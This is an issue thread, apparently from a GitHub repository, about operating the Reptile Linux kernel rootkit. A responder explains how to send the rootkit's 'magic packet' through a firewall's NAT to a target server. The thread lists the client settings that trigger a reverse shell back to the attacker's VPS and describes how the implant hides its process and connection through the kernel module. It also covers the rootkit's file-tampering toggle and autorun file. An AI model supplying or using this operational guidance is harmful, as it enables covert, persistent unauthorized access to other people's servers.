Nat about reptile HOT 7 CLOSED

As you aren't getting problems with the reversing connection, I will assume you are able to figure this part out.

So your only problem is the magic packet. You need to get sure how the firewall is working and doing the NAT redirect. Obviously ICMP won't work, because NAT normally doesn't forward those packets.

You have to figure out what port the firewall is routing to the target server, and send the magic packet on this port. I recommend you use SRCHOST equal to your LHOST, because you can get some trouble with src spoofing in some firewall rules.

Ex.: If the server is an webserver behind a firewall, you can send your magic packet through port 80 or 443 (tcp obviously) with srchost == lhost, and get your reverse shell in your VPS.

I hope I helped you.

from reptile.

So, when I did setup, I choosed default port 666, now I should change this to 80, right? How I can change it? Where is the config on server after installation?

from reptile.

The default port 666 is the source port, not the remote port. The reptile accepts magic packet on any tcp port you want, but the source porte has to be 666.

So, use the client to setup the packet for you in your VPS and do the configuration below:

set LHOST [your ip]
set SRCHOST [your ip]
set RHOST [target ip]
set RPORT [target port]
set PROT tcp
set PASS [your pass chosen]

note: SRCPORT must keep 666.

and type run. It should be get your reverse shell.

from reptile.

It works! Thank you a lot! Next question, how to remove ./reverse from autorun and uninstall correctly?

from reptile.

1 - disable the file tampering feature with /reptile/reptile_cmd file-tampering
2 - comment the line of reptile_reverse in the file /reptile/reptile_start
3 - enable again the file tampering /reptile/reptile_cmd file-tampering

To uninstall reptile you only need to run setup.sh remove but you will have to reboot the system to complete the uninstallation.

from reptile.

When I installed first time with magic packet, I did not remove it, and installed again just reverse in root directory. Should I just remove /root/Reptile folder? Because reverse is run from /root/Reptile, not from /reptile/, or those commands that you wrote upper it’s important?

from reptile.

When you send the magic packet, the kernel module will run /reptile/reptile_reverse. So if you are running by hand in /root/Reptile, you can run by hand in /reptile too. So you can remove this /root/Reptile.

And there is another detail: /reptile/repitle_reverse is compiled to run with kernel module, so, it communicates with kernel module to hide its process and its connection. If you've compiled reverse in standalone version, it will works, but won't communicate with kernel module, in other words, is better use the /reptile/reptile_reverse when you already have the kernel module installed.

from reptile.